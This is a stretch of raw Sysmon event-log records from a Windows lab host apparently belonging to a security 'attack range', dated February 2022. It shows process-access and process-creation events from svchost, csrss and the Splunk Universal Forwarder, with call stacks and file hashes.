10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213694Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213693Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213692Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213691Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0D8B-6216-E303-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213690Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.915{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D8B-6216-E303-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213689Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.916{4F8D34B0-0D8B-6216-E303-000000003902}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000213688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0D8B-6216-E203-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213681Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213680Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213679Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213678Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0D8B-6216-E203-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213677Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.415{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0D8B-6216-E203-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.416{4F8D34B0-0D8B-6216-E203-000000003902}2740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:47.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E888848BB31508B8B32C19C398019E70,SHA256=9E18BE101277351F2E412663EA4A1C85FB7B2FF61FFAAB5C30789EA59231B32A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 